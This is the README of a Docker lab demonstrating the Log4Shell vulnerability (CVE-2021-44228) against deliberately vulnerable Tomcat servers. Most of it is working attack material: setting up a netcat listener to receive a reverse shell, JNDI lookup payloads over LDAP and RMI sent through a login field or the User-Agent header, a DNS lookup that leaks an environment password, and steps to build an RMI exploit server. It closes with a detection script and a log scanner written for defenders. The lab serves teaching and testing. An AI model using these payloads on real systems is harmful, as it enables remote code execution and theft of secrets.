A Docker based LDAP RCE exploit demo for CVE-2021-44228 Log4Shell
The demo Tomcat 8 server on port 8080 has a vulnerable app (log4shell) deployed on it, and the server is also vulnerable via User-Agent attacks.
The remote exploit app in this demo is based on that found at https://github.com/kozmer/log4j-shell-poc
This demo Tomcat server (Tomcat 8.5.3, Java 1.8.0u51) has been reconfigured to use Log4J2 for logging, a non-standard configuration.
A newer Bitnami server is now available on port 8888. It is also configured for Log4J2 logging and is running Tomcat 9.0.55 and OpenJDK 11.0.13.
The RMI exploit against the Tomcat 9 / Java 11 server is described here: https://www.veracode.com/blog/research/exploiting-jndi-injections-java (Jan 3, 2019) by Michael Stepankin
The detection script checks for User-Agent vulnerabilities and is from here: https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6
This code requires Docker and Docker Compose.

Clone the repository and build the images. Edit `docker-compose.yml` first to adjust the environment variables as needed:

```sh
git clone https://github.com/cyberxml/log4j-poc
cd log4j-poc
# edit docker-compose.yml to adjust the environment variables as needed.
# POC_ADDR is the address of the cve-poc container
# LISTENER_ADDR is the address of the 'nc' listener, e.g. the docker host
# (the machine on which you will run the netcat 'nc' listener; this can be
# the local IP of the docker host machine).
docker-compose build
```

LDAP demo via the web application. Start the `nc` listener, bring up the containers, then use the demo app's credentials and the JNDI lookup string:

```sh
nc -lv 10.10.10.31 9001
docker-compose up
```

```
admin
password
${jndi:ldap://172.16.238.11:1389/a}
```

LDAP demo via the User-Agent header. Start the `nc` listener, bring up the containers, and send the lookup string as the User-Agent:

```sh
nc -lv 10.10.10.31 9001
docker-compose up
curl -A "\${jndi:ldap://172.16.238.11:1389/a}" http://10.10.10.31:8080/log4shell
```

DNS lookup demo (with a nested `${env:POC_PASSWORD}` lookup) against the Tomcat 9 server on port 8888:

```sh
docker-compose up
curl -A "\${jndi:dns://10.10.10.31/\${env:POC_PASSWORD}}" http://10.10.10.31:8888/log4shell/
```
I am having issues with the command line arg for the ping target, so you have to compile it yourself.
RMI demo against the Tomcat 9 / Java 11 server. Bring up the containers, then compile and run the RMI server inside the cve-poc container:

```sh
docker-compose up
docker exec -it log4j-poc_cve-poc_1 /bin/bash
cd /home/user/rmi-poc
javac -cp catalina.jar:. RMIServerPOC.java
java -cp catalina.jar:. RMIServerPOC 127.0.0.1   # run the compiled class
```
Then send the RMI lookup string as the User-Agent:

```sh
docker-compose up
curl -A "\${jndi:rmi://172.16.238.11:1097/Object}" http://10.10.10.31:8888/
```

Detection: run the check script against the Tomcat 8 app (it tests for User-Agent vulnerabilities):

```sh
python3 log4j_rce_check.py http://10.10.10.31:8080/log4shell --attacker-host 10.10.10.31:11389 --timeout=2
```
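As an added defender-side example (written for this page, not code from the repository or the detection gist), a nesting-aware scanner over constructed Tomcat access-log lines: it flags User-Agent values carrying a `${jndi:...}` lookup, reports the sub-scheme (ldap, dns, rmi) and surfaces nested `${env:...}` lookups like the one in the DNS request above. The log format and the sample lines are assumptions.

```python
import re
# Constructed Tomcat-style access log lines (not taken from the repository); the
# User-Agent is the final quoted field, mirroring the curl -A payloads above.
SAMPLE_LOG = [
    '10.10.10.5 - - [10/Dec/2021:12:00:01 +0000] "GET /log4shell HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.10.10.5 - - [10/Dec/2021:12:00:02 +0000] "GET /log4shell HTTP/1.1" 200 512 "-" "${jndi:ldap://172.16.238.11:1389/a}"',
    '10.10.10.5 - - [10/Dec/2021:12:00:03 +0000] "GET /log4shell/ HTTP/1.1" 200 512 "-" "${jndi:dns://10.10.10.31/${env:POC_PASSWORD}}"',
    '10.10.10.5 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:rmi://172.16.238.11:1097/Object}"',
]

def extract_lookups(text):
    """Return the top-level ${...} lookups in text. A stack of open positions is
    kept so a nested lookup such as ${jndi:dns://h/${env:X}} comes back whole."""
    found, stack, i = [], [], 0
    while i < len(text):
        if text.startswith("${", i):
            stack.append(i)          # remember where this lookup opened
            i += 2
            continue
        if text[i] == "}" and stack:
            start = stack.pop()
            if not stack:            # closed the outermost lookup
                found.append(text[start:i + 1])
        i += 1
    return found                     # an unterminated "${" is simply not reported

def parse_jndi(raw):
    """Classify one top-level lookup; None unless it is a jndi: lookup."""
    m = re.match(r"\$\{jndi:([a-z]+):", raw, re.IGNORECASE)
    if not m:
        return None
    body = raw[2:-1][len("jndi:"):]  # strip "${", "}" and the jndi: prefix
    return {"raw": raw, "scheme": m.group(1).lower(),
            "nested": extract_lookups(body)}  # e.g. ["${env:POC_PASSWORD}"]

def scan_access_log(lines):
    """Return (line_no, finding) for each User-Agent carrying a jndi lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        ua = line.rsplit('"', 2)[1] if line.count('"') >= 2 else line
        for raw in extract_lookups(ua):
            finding = parse_jndi(raw)
            if finding:
                hits.append((n, finding))
    return hits

if __name__ == "__main__":
    for n, f in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: scheme={f['scheme']} nested={f['nested']} raw={f['raw']}")
```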